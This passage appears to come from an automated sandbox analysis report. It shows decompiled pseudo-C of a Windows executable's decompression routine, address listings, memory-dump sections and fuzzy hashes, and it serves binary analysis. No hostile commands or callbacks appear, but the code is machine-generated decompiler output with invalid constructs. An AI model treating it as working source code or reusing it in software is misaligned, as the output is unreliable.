                                                                                                                        											__al =  *(__ebp - 0x5c);
                                                                                                                        											__edx =  *(__ebp - 8);
                                                                                                                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                        											 *( *(__ebp - 0x68)) = __al;
                                                                                                                        											__ecx =  *(__ebp - 0x14);
                                                                                                                        											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                        											__eax = __ecx + 1;
                                                                                                                        											__edx = 0;
                                                                                                                        											_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                        											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        											__edx = _t192;
                                                                                                                        											goto L80;
                                                                                                                        										case 0x1b:
                                                                                                                        											L76:
                                                                                                                        											__eflags =  *(__ebp - 0x64);
                                                                                                                        											if( *(__ebp - 0x64) == 0) {
                                                                                                                        												 *(__ebp - 0x88) = 0x1b;
                                                                                                                        												goto L170;
                                                                                                                        											}
                                                                                                                        											__eax =  *(__ebp - 0x14);
                                                                                                                        											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        												__eflags = __eax;
                                                                                                                        											}
                                                                                                                        											__edx =  *(__ebp - 8);
                                                                                                                        											__cl =  *(__eax + __edx);
                                                                                                                        											__eax =  *(__ebp - 0x14);
                                                                                                                        											 *(__ebp - 0x5c) = __cl;
                                                                                                                        											 *(__eax + __edx) = __cl;
                                                                                                                        											__eax = __eax + 1;
                                                                                                                        											__edx = 0;
                                                                                                                        											_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                        											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        											__edx = _t275;
                                                                                                                        											__eax =  *(__ebp - 0x68);
                                                                                                                        											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                        											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        											_t284 = __ebp - 0x64;
                                                                                                                        											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                        											__eflags =  *_t284;
                                                                                                                        											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                        											L80:
                                                                                                                        											 *(__ebp - 0x14) = __edx;
                                                                                                                        											goto L81;
                                                                                                                        										case 0x1c:
                                                                                                                        											while(1) {
                                                                                                                        												L124:
                                                                                                                        												__eflags =  *(__ebp - 0x64);
                                                                                                                        												if( *(__ebp - 0x64) == 0) {
                                                                                                                        													break;
                                                                                                                        												}
                                                                                                                        												__eax =  *(__ebp - 0x14);
                                                                                                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        													__eflags = __eax;
                                                                                                                        												}
                                                                                                                        												__edx =  *(__ebp - 8);
                                                                                                                        												__cl =  *(__eax + __edx);
                                                                                                                        												__eax =  *(__ebp - 0x14);
                                                                                                                        												 *(__ebp - 0x5c) = __cl;
                                                                                                                        												 *(__eax + __edx) = __cl;
                                                                                                                        												__eax = __eax + 1;
                                                                                                                        												__edx = 0;
                                                                                                                        												_t415 = __eax %  *(__ebp - 0x74);
                                                                                                                        												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        												__edx = _t415;
                                                                                                                        												__eax =  *(__ebp - 0x68);
                                                                                                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                        												__eflags =  *(__ebp - 0x30);
                                                                                                                        												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                        												 *(__ebp - 0x14) = _t415;
                                                                                                                        												if( *(__ebp - 0x30) > 0) {
                                                                                                                        													continue;
                                                                                                                        												} else {
                                                                                                                        													L81:
                                                                                                                        													 *(__ebp - 0x88) = 2;
                                                                                                                        													goto L1;
                                                                                                                        												}
                                                                                                                        											}
                                                                                                                        											 *(__ebp - 0x88) = 0x1c;
                                                                                                                        											L170:
                                                                                                                        											_push(0x22);
                                                                                                                        											_pop(_t567);
                                                                                                                        											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                                                                                                                        											_t535 = 0;
                                                                                                                        											L172:
                                                                                                                        											return _t535;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								L171:
                                                                                                                        								_t535 = _t534 | 0xffffffff;
                                                                                                                        								goto L172;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						__eax =  *(__ebp - 0x50);
                                                                                                                        						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                        						__eax =  *(__ebp - 0x58);
                                                                                                                        						__esi = __edx + __eax;
                                                                                                                        						 *(__ebp - 0x54) = __esi;
                                                                                                                        						__ax =  *__esi;
                                                                                                                        						__edi = __ax & 0x0000ffff;
                                                                                                                        						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        						if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        							__cx = __ax;
                                                                                                                        							__cx = __ax >> 5;
                                                                                                                        							__eax = __eax - __ecx;
                                                                                                                        							__edx = __edx + 1;
                                                                                                                        							 *__esi = __ax;
                                                                                                                        							 *(__ebp - 0x50) = __edx;
                                                                                                                        						} else {
                                                                                                                        							 *(__ebp - 0x10) = __ecx;
                                                                                                                        							0x800 = 0x800 - __edi;
                                                                                                                        							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                        							 *__esi = __cx;
                                                                                                                        						}
                                                                                                                        						if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        							goto L148;
                                                                                                                        						} else {
                                                                                                                        							goto L146;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					goto L1;
                                                                                                                        				}
                                                                                                                        			}








                                                                                                                        0x0040685b
                                                                                                                        0x00406862
                                                                                                                        0x00406862
                                                                                                                        0x00406865
                                                                                                                        0x0040686c
                                                                                                                        0x00406899
                                                                                                                        0x0040689d
                                                                                                                        0x004068fd
                                                                                                                        0x00406900
                                                                                                                        0x00406905
                                                                                                                        0x00406906
                                                                                                                        0x00406908
                                                                                                                        0x0040690a
                                                                                                                        0x0040690d
                                                                                                                        0x00406819
                                                                                                                        0x00406819
                                                                                                                        0x00406819
                                                                                                                        0x00405fb5
                                                                                                                        0x00405fb5
                                                                                                                        0x00405fb5
                                                                                                                        0x00405fbe
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fc4
                                                                                                                        0x00000000
                                                                                                                        0x00405fcf
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fd8
                                                                                                                        0x00405fdb
                                                                                                                        0x00405fde
                                                                                                                        0x00405fe2
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fe8
                                                                                                                        0x00405feb
                                                                                                                        0x00405fed
                                                                                                                        0x00405fee
                                                                                                                        0x00405ff1
                                                                                                                        0x00405ff3
                                                                                                                        0x00405ff4
                                                                                                                        0x00405ff6
                                                                                                                        0x00405ff9
                                                                                                                        0x00405ffe
                                                                                                                        0x00406003
                                                                                                                        0x0040600c
                                                                                                                        0x0040601f
                                                                                                                        0x00406022
                                                                                                                        0x0040602e
                                                                                                                        0x00406056
                                                                                                                        0x00406058
                                                                                                                        0x00406066
                                                                                                                        0x00406066
                                                                                                                        0x0040606a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040605a
                                                                                                                        0x0040605a
                                                                                                                        0x0040605d
                                                                                                                        0x0040605e
                                                                                                                        0x0040605e
                                                                                                                        0x00000000
                                                                                                                        0x0040605a
                                                                                                                        0x00406034
                                                                                                                        0x00406039
                                                                                                                        0x00406039
                                                                                                                        0x00406042
                                                                                                                        0x0040604a
                                                                                                                        0x0040604d
                                                                                                                        0x00000000
                                                                                                                        0x00406053
                                                                                                                        0x00406053
                                                                                                                        0x00000000
                                                                                                                        0x00406053
                                                                                                                        0x00000000
                                                                                                                        0x00406070
                                                                                                                        0x00406070
                                                                                                                        0x00406074
                                                                                                                        0x00406920
                                                                                                                        0x00000000
                                                                                                                        0x00406920
                                                                                                                        0x0040607d
                                                                                                                        0x0040608d
                                                                                                                        0x00406090
                                                                                                                        0x00406093
                                                                                                                        0x00406093
                                                                                                                        0x00406093
                                                                                                                        0x00406096
                                                                                                                        0x0040609a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040609c
                                                                                                                        0x004060a2
                                                                                                                        0x004060cc
                                                                                                                        0x004060d2
                                                                                                                        0x004060d9
                                                                                                                        0x00000000
                                                                                                                        0x004060d9
                                                                                                                        0x004060a8
                                                                                                                        0x004060ab
                                                                                                                        0x004060b0
                                                                                                                        0x004060b0
                                                                                                                        0x004060bb
                                                                                                                        0x004060c3
                                                                                                                        0x004060c6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040610b
                                                                                                                        0x00406111
                                                                                                                        0x00406114
                                                                                                                        0x00406121
                                                                                                                        0x00406129
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004060e0
                                                                                                                        0x004060e0
                                                                                                                        0x004060e4
                                                                                                                        0x0040692f
                                                                                                                        0x00000000
                                                                                                                        0x0040692f
                                                                                                                        0x004060f0
                                                                                                                        0x004060fb
                                                                                                                        0x004060fb
                                                                                                                        0x004060fb
                                                                                                                        0x004060fe
                                                                                                                        0x00406101
                                                                                                                        0x00406104
                                                                                                                        0x00406109
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004067a0
                                                                                                                        0x004067a0
                                                                                                                        0x004067a6
                                                                                                                        0x004067ac
                                                                                                                        0x004067b2
                                                                                                                        0x004067cc
                                                                                                                        0x004067cf
                                                                                                                        0x004067d5
                                                                                                                        0x004067e0
                                                                                                                        0x004067e0
                                                                                                                        0x004067e2
                                                                                                                        0x004067b4
                                                                                                                        0x004067b4
                                                                                                                        0x004067c3
                                                                                                                        0x004067c7
                                                                                                                        0x004067c7
                                                                                                                        0x004067ec
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004067ee
                                                                                                                        0x004067f2
                                                                                                                        0x004069a1
                                                                                                                        0x00000000
                                                                                                                        0x004069a1
                                                                                                                        0x004067fe
                                                                                                                        0x00406805
                                                                                                                        0x0040680d
                                                                                                                        0x00406810
                                                                                                                        0x00406813
                                                                                                                        0x00406813
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406131
                                                                                                                        0x00406133
                                                                                                                        0x00406136
                                                                                                                        0x004061a7
                                                                                                                        0x004061aa
                                                                                                                        0x004061ad
                                                                                                                        0x004061b4
                                                                                                                        0x004061be
                                                                                                                        0x00000000
                                                                                                                        0x004061be
                                                                                                                        0x00406138
                                                                                                                        0x0040613c
                                                                                                                        0x0040613f
                                                                                                                        0x00406141
                                                                                                                        0x00406144
                                                                                                                        0x00406147
                                                                                                                        0x00406149
                                                                                                                        0x0040614c
                                                                                                                        0x0040614e
                                                                                                                        0x00406153
                                                                                                                        0x00406156
                                                                                                                        0x00406159
                                                                                                                        0x0040615d
                                                                                                                        0x00406164
                                                                                                                        0x00406167
                                                                                                                        0x0040616e
                                                                                                                        0x00406172
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x0040617e
                                                                                                                        0x00406181
                                                                                                                        0x0040619f
                                                                                                                        0x004061a1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406313
                                                                                                                        0x00406374
                                                                                                                        0x00406374
                                                                                                                        0x00406377
                                                                                                                        0x0040637a
                                                                                                                        0x0040637d
                                                                                                                        0x00406380
                                                                                                                        0x00406383
                                                                                                                        0x00406386
                                                                                                                        0x00406389
                                                                                                                        0x0040638c
                                                                                                                        0x0040638f
                                                                                                                        0x00406392
                                                                                                                        0x004063aa
                                                                                                                        0x004063ad
                                                                                                                        0x004063b0
                                                                                                                        0x004063b3
                                                                                                                        0x004063b3
                                                                                                                        0x004063b6
                                                                                                                        0x004063ba
                                                                                                                        0x004063bc
                                                                                                                        0x00406394
                                                                                                                        0x00406394
                                                                                                                        0x0040639c
                                                                                                                        0x004063a1
                                                                                                                        0x004063a3
                                                                                                                        0x004063a5
                                                                                                                        0x004063a5
                                                                                                                        0x004063bf
                                                                                                                        0x004063c6
                                                                                                                        0x004063c9
                                                                                                                        0x00000000
                                                                                                                        0x004063cb
                                                                                                                        0x00000000
                                                                                                                        0x004063cb
                                                                                                                        0x00000000
                                                                                                                        0x00406658
                                                                                                                        0x00406658
                                                                                                                        0x0040665c
                                                                                                                        0x00406983
                                                                                                                        0x00000000
                                                                                                                        0x00406983
                                                                                                                        0x00406662
                                                                                                                        0x00406665
                                                                                                                        0x00406668
                                                                                                                        0x0040666c
                                                                                                                        0x0040666f
                                                                                                                        0x00406675
                                                                                                                        0x00406677
                                                                                                                        0x00406677
                                                                                                                        0x00406677
                                                                                                                        0x0040667a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406428
                                                                                                                        0x00406428
                                                                                                                        0x0040642b
                                                                                                                        0x0040679d
                                                                                                                        0x0040679d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406824
                                                                                                                        0x00406828
                                                                                                                        0x00406846
                                                                                                                        0x00406846
                                                                                                                        0x00406846
                                                                                                                        0x0040684d
                                                                                                                        0x00406854
                                                                                                                        0x00000000
                                                                                                                        0x00406854
                                                                                                                        0x0040682a
                                                                                                                        0x0040682d
                                                                                                                        0x00406830
                                                                                                                        0x00406833
                                                                                                                        0x0040683a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406915
                                                                                                                        0x00406918
                                                                                                                        0x00406819
                                                                                                                        0x00406819
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040654f
                                                                                                                        0x00406551
                                                                                                                        0x00406558
                                                                                                                        0x00406559
                                                                                                                        0x0040655b
                                                                                                                        0x0040655e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406566
                                                                                                                        0x00406569
                                                                                                                        0x0040656c
                                                                                                                        0x0040656e
                                                                                                                        0x00406570
                                                                                                                        0x00406570
                                                                                                                        0x00406571
                                                                                                                        0x00406574
                                                                                                                        0x0040657b
                                                                                                                        0x0040657e
                                                                                                                        0x0040658c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406871
                                                                                                                        0x00406871
                                                                                                                        0x00406875
                                                                                                                        0x004069ad
                                                                                                                        0x00000000
                                                                                                                        0x004069ad
                                                                                                                        0x0040687b
                                                                                                                        0x0040687e
                                                                                                                        0x00406881
                                                                                                                        0x00406885
                                                                                                                        0x00406888
                                                                                                                        0x0040688e
                                                                                                                        0x00406890
                                                                                                                        0x00406890
                                                                                                                        0x00406890
                                                                                                                        0x00406893
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00406896
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406594
                                                                                                                        0x00406597
                                                                                                                        0x004065cd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x00406700
                                                                                                                        0x00406700
                                                                                                                        0x00406703
                                                                                                                        0x00406705
                                                                                                                        0x0040698f
                                                                                                                        0x00000000
                                                                                                                        0x0040698f
                                                                                                                        0x0040670b
                                                                                                                        0x0040670e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406714
                                                                                                                        0x00406718
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x00000000
                                                                                                                        0x0040671b
                                                                                                                        0x00406599
                                                                                                                        0x0040659b
                                                                                                                        0x0040659d
                                                                                                                        0x0040659f
                                                                                                                        0x004065a2
                                                                                                                        0x004065a3
                                                                                                                        0x004065a5
                                                                                                                        0x004065a7
                                                                                                                        0x004065aa
                                                                                                                        0x004065ad
                                                                                                                        0x004065c3
                                                                                                                        0x004065c8
                                                                                                                        0x00406600
                                                                                                                        0x00406600
                                                                                                                        0x00406604
                                                                                                                        0x00406630
                                                                                                                        0x00406632
                                                                                                                        0x00406639
                                                                                                                        0x0040663c
                                                                                                                        0x0040663f
                                                                                                                        0x0040663f
                                                                                                                        0x00406644
                                                                                                                        0x00406644
                                                                                                                        0x00406646
                                                                                                                        0x00406649
                                                                                                                        0x00406650
                                                                                                                        0x00406653
                                                                                                                        0x00406680
                                                                                                                        0x00406680
                                                                                                                        0x00406683
                                                                                                                        0x00406686
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x00000000
                                                                                                                        0x004066fa
                                                                                                                        0x00406688
                                                                                                                        0x0040668e
                                                                                                                        0x00406691
                                                                                                                        0x00406694
                                                                                                                        0x00406697
                                                                                                                        0x0040669a
                                                                                                                        0x0040669d
                                                                                                                        0x004066a0
                                                                                                                        0x004066a3
                                                                                                                        0x004066a6
                                                                                                                        0x004066a9
                                                                                                                        0x004066c2
                                                                                                                        0x004066c4
                                                                                                                        0x004066c7
                                                                                                                        0x004066c8
                                                                                                                        0x004066cb
                                                                                                                        0x004066cd
                                                                                                                        0x004066d0
                                                                                                                        0x004066d2
                                                                                                                        0x004066d4
                                                                                                                        0x004066d7

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                                                        • Instruction ID: 868f2ec1f3ea74d7de1394d818727f69d5aca31e92bf34b5737afca42cfaef71
                                                                                                                        • Opcode Fuzzy Hash: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                                                        • Instruction Fuzzy Hash: 6E913171D00229CBEF28CF98C8547ADBBB1FF44305F15812AD856BB281C7789A9ADF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E0040647D() {
                                                                                                                        				unsigned short _t532;
                                                                                                                        				signed int _t533;
                                                                                                                        				void _t534;
                                                                                                                        				void* _t535;
                                                                                                                        				signed int _t536;
                                                                                                                        				signed int _t565;
                                                                                                                        				signed int _t568;
                                                                                                                        				signed int _t589;
                                                                                                                        				signed int* _t606;
                                                                                                                        				void* _t613;
                                                                                                                        
                                                                                                                        				L0:
                                                                                                                        				while(1) {
                                                                                                                        					L0:
                                                                                                                        					if( *(_t613 - 0x40) != 0) {
                                                                                                                        						L89:
                                                                                                                        						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                                                                        						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                                                                        						L69:
                                                                                                                        						_t606 =  *(_t613 - 0x58);
                                                                                                                        						 *(_t613 - 0x84) = 0x12;
                                                                                                                        						L132:
                                                                                                                        						 *(_t613 - 0x54) = _t606;
                                                                                                                        						L133:
                                                                                                                        						_t532 =  *_t606;
                                                                                                                        						_t589 = _t532 & 0x0000ffff;
                                                                                                                        						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                        						if( *(_t613 - 0xc) >= _t565) {
                                                                                                                        							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                        							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                        							 *(_t613 - 0x40) = 1;
                                                                                                                        							_t533 = _t532 - (_t532 >> 5);
                                                                                                                        							 *_t606 = _t533;
                                                                                                                        						} else {
                                                                                                                        							 *(_t613 - 0x10) = _t565;
                                                                                                                        							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                        							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                                                                        						}
                                                                                                                        						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                        							L139:
                                                                                                                        							_t534 =  *(_t613 - 0x84);
                                                                                                                        							L140:
                                                                                                                        							 *(_t613 - 0x88) = _t534;
                                                                                                                        							goto L1;
                                                                                                                        						} else {
                                                                                                                        							L137:
                                                                                                                        							if( *(_t613 - 0x6c) == 0) {
                                                                                                                        								 *(_t613 - 0x88) = 5;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                        							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                        							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                        							goto L139;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						if( *(__ebp - 0x60) == 0) {
                                                                                                                        							L171:
                                                                                                                        							_t536 = _t535 | 0xffffffff;
                                                                                                                        							L172:
                                                                                                                        							return _t536;
                                                                                                                        						}
                                                                                                                        						__eax = 0;
                                                                                                                        						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                        						0 | _t258 = _t258 + _t258 + 9;
                                                                                                                        						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                        						L75:
                                                                                                                        						if( *(__ebp - 0x64) == 0) {
                                                                                                                        							 *(__ebp - 0x88) = 0x1b;
                                                                                                                        							L170:
                                                                                                                        							_t568 = 0x22;
                                                                                                                        							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                        							_t536 = 0;
                                                                                                                        							goto L172;
                                                                                                                        						}
                                                                                                                        						__eax =  *(__ebp - 0x14);
                                                                                                                        						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        						if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        							__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        						}
                                                                                                                        						__edx =  *(__ebp - 8);
                                                                                                                        						__cl =  *(__eax + __edx);
                                                                                                                        						__eax =  *(__ebp - 0x14);
                                                                                                                        						 *(__ebp - 0x5c) = __cl;
                                                                                                                        						 *(__eax + __edx) = __cl;
                                                                                                                        						__eax = __eax + 1;
                                                                                                                        						__edx = 0;
                                                                                                                        						_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                        						__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        						__edx = _t274;
                                                                                                                        						__eax =  *(__ebp - 0x68);
                                                                                                                        						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                        						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        						_t283 = __ebp - 0x64;
                                                                                                                        						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                        						 *( *(__ebp - 0x68)) = __cl;
                                                                                                                        						L79:
                                                                                                                        						 *(__ebp - 0x14) = __edx;
                                                                                                                        						L80:
                                                                                                                        						 *(__ebp - 0x88) = 2;
                                                                                                                        					}
                                                                                                                        					L1:
                                                                                                                        					_t535 =  *(_t613 - 0x88);
                                                                                                                        					if(_t535 > 0x1c) {
                                                                                                                        						goto L171;
                                                                                                                        					}
                                                                                                                        					switch( *((intOrPtr*)(_t535 * 4 +  &M004069D4))) {
                                                                                                                        						case 0:
                                                                                                                        							if( *(_t613 - 0x6c) == 0) {
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                        							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                        							_t535 =  *( *(_t613 - 0x70));
                                                                                                                        							if(_t535 > 0xe1) {
                                                                                                                        								goto L171;
                                                                                                                        							}
                                                                                                                        							_t539 = _t535 & 0x000000ff;
                                                                                                                        							_push(0x2d);
                                                                                                                        							asm("cdq");
                                                                                                                        							_pop(_t570);
                                                                                                                        							_push(9);
                                                                                                                        							_pop(_t571);
                                                                                                                        							_t609 = _t539 / _t570;
                                                                                                                        							_t541 = _t539 % _t570 & 0x000000ff;
                                                                                                                        							asm("cdq");
                                                                                                                        							_t604 = _t541 % _t571 & 0x000000ff;
                                                                                                                        							 *(_t613 - 0x3c) = _t604;
                                                                                                                        							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                        							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                                                                        							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                        							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                        								L10:
                                                                                                                        								if(_t612 == 0) {
                                                                                                                        									L12:
                                                                                                                        									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                        									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                        									goto L15;
                                                                                                                        								} else {
                                                                                                                        									goto L11;
                                                                                                                        								}
                                                                                                                        								do {
                                                                                                                        									L11:
                                                                                                                        									_t612 = _t612 - 1;
                                                                                                                        									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                        								} while (_t612 != 0);
                                                                                                                        								goto L12;
                                                                                                                        							}
                                                                                                                        							if( *(_t613 - 4) != 0) {
                                                                                                                        								GlobalFree( *(_t613 - 4));
                                                                                                                        							}
                                                                                                                        							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                        							 *(_t613 - 4) = _t535;
                                                                                                                        							if(_t535 == 0) {
                                                                                                                        								goto L171;
                                                                                                                        							} else {
                                                                                                                        								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                        								goto L10;
                                                                                                                        							}
                                                                                                                        						case 1:
                                                                                                                        							L13:
                                                                                                                        							__eflags =  *(_t613 - 0x6c);
                                                                                                                        							if( *(_t613 - 0x6c) == 0) {
                                                                                                                        								 *(_t613 - 0x88) = 1;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                        							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                        							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                        							_t45 = _t613 - 0x48;
                                                                                                                        							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                        							__eflags =  *_t45;
                                                                                                                        							L15:
                                                                                                                        							if( *(_t613 - 0x48) < 4) {
                                                                                                                        								goto L13;
                                                                                                                        							}
                                                                                                                        							_t547 =  *(_t613 - 0x40);
                                                                                                                        							if(_t547 ==  *(_t613 - 0x74)) {
                                                                                                                        								L20:
                                                                                                                        								 *(_t613 - 0x48) = 5;
                                                                                                                        								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                        								goto L23;
                                                                                                                        							}
                                                                                                                        							 *(_t613 - 0x74) = _t547;
                                                                                                                        							if( *(_t613 - 8) != 0) {
                                                                                                                        								GlobalFree( *(_t613 - 8));
                                                                                                                        							}
                                                                                                                        							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                        							 *(_t613 - 8) = _t535;
                                                                                                                        							if(_t535 == 0) {
                                                                                                                        								goto L171;
                                                                                                                        							} else {
                                                                                                                        								goto L20;
                                                                                                                        							}
                                                                                                                        						case 2:
